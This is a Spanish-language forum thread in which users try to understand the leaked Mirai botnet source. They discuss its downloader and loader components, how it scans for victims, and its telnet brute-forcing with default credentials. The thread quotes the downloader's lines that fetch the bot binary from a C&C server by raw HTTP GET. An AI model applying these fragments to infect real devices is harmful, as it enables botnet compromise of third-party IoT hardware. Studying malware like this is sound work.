Hola :D, hace poco estuve investigando algo sobre Mirai, estuve mirando el código de aquí:
https://github.com/jgamblin/Mirai-Source-Code (https://github.com/jgamblin/Mirai-Source-Code)
y me prguntaba que eran los directorios dlr y loader, y en general como buscaba víctimas este malware.
Gracias y saludos.
Sin mirarlo dlr debe venir de downloader, "descargador" y loader "subidor".
Será para descargar y subir módulos de la botnet para añadirle funcionalidades, para descargar o subir un exploit(un código malicioso para hackear el tarjet aprovechando una fallo de seguridad) o para descargar desde ese software el propio server de la botnet o cualquier archivo.
No sé si tiene alguna función para buscar targets, lo normal es usar dorks, bases de datos, o los propios servidores de los proveedores de cámaras.
Si hay alguna parte del código que no entiendas publícala y la comentamos.
Mirai probaba a conectarse usando telnet con los credenciales por defecto.
Gracias por la ayuda :-*,
entonces, del dlr y el loader, ¿donde se ejecutaría cada uno, en el servidor o en el cliente/bot?
Creo que las víctimas las busca con fuerza bruta en las IPs, aquí puedes echarle un vistazo:
https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/scanner.c (https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/scanner.c)
En lo que respecta al dlr en su main tienes esto:
#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP
Esto se conecta al servidor http que tu pongas como pone en esa linea.
y hace peticiones GET a dicho server:
if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))
Y se baja el contenido guardandolo en un archivo.
Es decir, que lo que estaría pasando, es que lo que se ejecuta en el ordenador de la víctima es el downloader que descarga lo principal del C&C, y el loader,
sería el programa que se ejecuta en el servidor y que responde al downloader, ¿no :huh:?